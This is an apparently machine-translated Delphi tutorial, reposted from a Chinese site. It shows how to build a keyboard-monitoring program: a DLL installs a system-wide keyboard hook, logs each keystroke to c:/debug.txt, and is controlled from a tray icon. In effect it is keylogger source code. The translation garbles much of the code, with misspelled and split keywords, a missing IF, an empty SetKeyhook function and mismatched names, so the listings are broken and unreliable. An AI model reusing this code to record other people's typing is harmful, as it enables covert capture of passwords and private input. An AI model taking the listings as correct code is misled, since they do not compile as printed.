Use hook technology to implement keyboard monitoring

zhaozj2021-02-08  300

Use hook technology to implement keyboard monitoring

Urumqi Medical College

Lu Lijian

---- In many systems, for security or other reasons, often require monitoring keyboards at any time, a professional monitoring program must have two points, one is real-time; second, it runs as an indication icon. This can be achieved in the indicator of the application that uses hook (ie hook) technology to add the application to the WINDOW taskbar. Based on the API help documentation, I discussed the two parts according to the specific implementation of the Delphi development environment.

First, the implementation of hook (hook):

---- Hook is a mechanism for monitoring a message stream in the Microsoft Windows message processing process to monitor message flows and have not yet reached the window of the window. If the hook process is implemented in the application, if the application is not the current window, the hook does not work; if the hook is implemented in the DLL, the program is dynamically called it in the run, which can monitor the system in real time. As needed, we use the way to implement HOOK in the DLL.

---- 1. Newly built a DLL file that exports two functions, defines the hook specific implementation process in HookProc.PAS. code show as below:

Library Keyspy;

Uses

Windows, Messages, HookProc in 'hookproc.pas';

Exports

SetKeyHOK,

EndKeyhook;

Begin

NextHOKPROC: = 0;

ProcsaveExit: = exitproc;

EXITPROC: = @ Keyhookexit;

End.

2. Realize the specific process of hooks in hookProc.pas:

Unit hookproc;

Interface

Uses

Windows, Messages, Sysutils, Controls, Stdctrls;

VAR

NextHOKPROC: hHOOK;

ProcsaveExit: Pointer;

Function KeyboardHook (icode: integer; wparam: wparam;

LPARAM: LPARAM): LRESULT; stdcall;

Function setKeyhook: bool; export; // load hook

Function endkeyhook: bool; export; // Uninstall hook

Procedure Keyhookexit; FAR;

Const

AfileName = 'c: /debug.txt'; / / write keyboard input action write file

VAR

Debugfile: TextFile;

IMPLEMENTATION

Function KeyboardHookHandler (Icode: wparam;

LPARAM: LPARAM): LRESULT; stdcall;

Begin

Icode <0 THEN

Begin

Result: = CallNexthookex (HNEXTHOOKPROC, ICODE, WPARAM, LPARAM);

EXIT;

END;

Assignfile (Debugfile, AfileName);

Append (debugfile);

IF getKeyState (vk_return) <0 THEN

Begin

Writeln (Debugfile, '');

Write (Debugfile, Char (WPARAM));

end

Else

Write (Debugfile, Char (WPARAM));

Closefile (Debugfile);

Result: = 0;

END;

Function endkeyhook: bool; export; begin

If nextookProc <> 0 THEN Begin

UnHookWindowshookex (NextHOOKPROC);

NextHOKPROC: = 0;

MessageBeep (0);

Result: = HNEXTHOKPROC = 0;

END;

Procedure Keyhookexit; FAR;

Begin

IF nextookProc <> 0. EndKeyhook;

EXITPROC: = procsaveexit;

End.

---- II, WIN95 / 98 uses the task bar to display the application or tool icon to the indication area icon, involve an API function shell_notifyicon, there are two parameters, one is pointing to the TNOTIFYICONDATA structure, The other is to add, delete, change the icon. The icon's icon is added to the indicator area through this function function, increasing professional characteristics as an icon. When the program starts, right-click the icon, pop up a menu, select Sthook or Endhook.

Unit KB;

Interface

Uses

Windows, Messages, Sysutils, Classes,

Graphics, Controls, Forms,

Dialogs,

STDCTRLS, MENUS, Shellapi;

Const

Icon_ID = 1;

MI_ICONEVENT = WM_USER 1; // Define a user message

Type

TFORM1 = Class (TFORM)

Popupmenu1: TPopupmenu;

Sthook1: Tmenuitem;

Endhook1: tmenuitem;

N1: tMenuitem;

About1: TMenuItem

Close1: TMenuItem

GetText1: TMenuItem

Procedure formcreate (Sender: TOBJECT);

Procedure setook1click (sender: TOBJECT);

Procedure endhook1click (sender: TOBJECT);

Procedure FormDestroy (Sender: TOBJECT);

Procedure Close1Click (Sender: TOBJECT);

Private

{Private Declarations}

NID: TNOTIFYICONDATA;

Normalicon: ticon;

public

{Public declarations}

Procedure icontray (var Msg: tMessage);

Message mi_ICONEVENT;

END;

VAR

FORM1: TFORM1;

IMPLEMENTATION

{$ R * .dfm}

Function setKeyhook: bool; exTernal 'keysspy.dll';

Function endkeyhook: bool; external 'keyspy.dll';

Procedure TFORM1.ICONTRAY (VAR MSG: TMESSAGE);

VAR

PT: TPOINT;

Begin

IF msg.lparam = wm_lbuttondown then

SetHook1click (Self);

if msg.lparam = wm_rbuttondown then

Begin

GetCursorpos (PT);

SetForegroundWindow (Handle);

PopupMenu1.Popup (pt.x, pt.y);

END;

Procedure TFORM1.FormCreate (Sender: TOBJECT);

Begin

Normalicon: = ticon.create;

Application.title: = CAPTION;

Nid.cbsize: = sizeof (NID);

Nid.wnd: = Handle;

Nid.uid: = icon_id;

Nid.uflags: = nif_icon or nif_message or nif_tip;

Nid.ucallbackMessage: = mi_ICONEVENT;

Nid.hicon: = normalicon.handle;

Strcopy (Nid.sztip, Pchar (CAPTION);

Nid.uflags: = nif_message or nif_icon or nif_tip;

Shell_notifyicon (NIM_ADD, @ NID);

Setwindowlong (Application.handle,

GWL_EXSTYLE, WS_EX_TOOLWINDOW);

END;

Procedure TFORM1.SETHOK1CLICK (Sender: TOBJECT);

Begin

SetKeyHOK;

END;

Procedure TFORM1.ENDHOOK1CLICK (Sender: TOBJECT);

Begin

EndKeyhook;

END;

Procedure TFORM1.FORMDESTROY (Sender: TOBJECT);

Begin

Nid.uflags: = 0;

Shell_notifyicon (Nim_Delete, @ NID);

END;

Procedure tform1.close1click (sender: TOBJECT);

Begin

Application.Terminate;

END;

---- This program only uses several shellai functions, but it involves more important than references to DLLs in Delphi, hook implementation, the operation of the indicator, the user-defined message processing, and the reading and writing of the file. Content, I believe this article can help many Delphi's beginners.

---- The program runs normally in Win98, Delphi4.0.

转载请注明原文地址:https://www.9cbs.com/read-1278.html

New Post(0)